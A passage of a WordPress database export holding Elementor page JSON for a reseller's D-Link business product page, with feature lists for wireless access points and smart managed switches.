Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7205,3358,'_elementor_version','2.5.14'),(7206,3358,'_elementor_edit_mode','builder'),(7209,3359,'_wp_page_template','template-fullwidth.php'),(7210,3359,'_elementor_template_type','post'),(7211,3359,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G 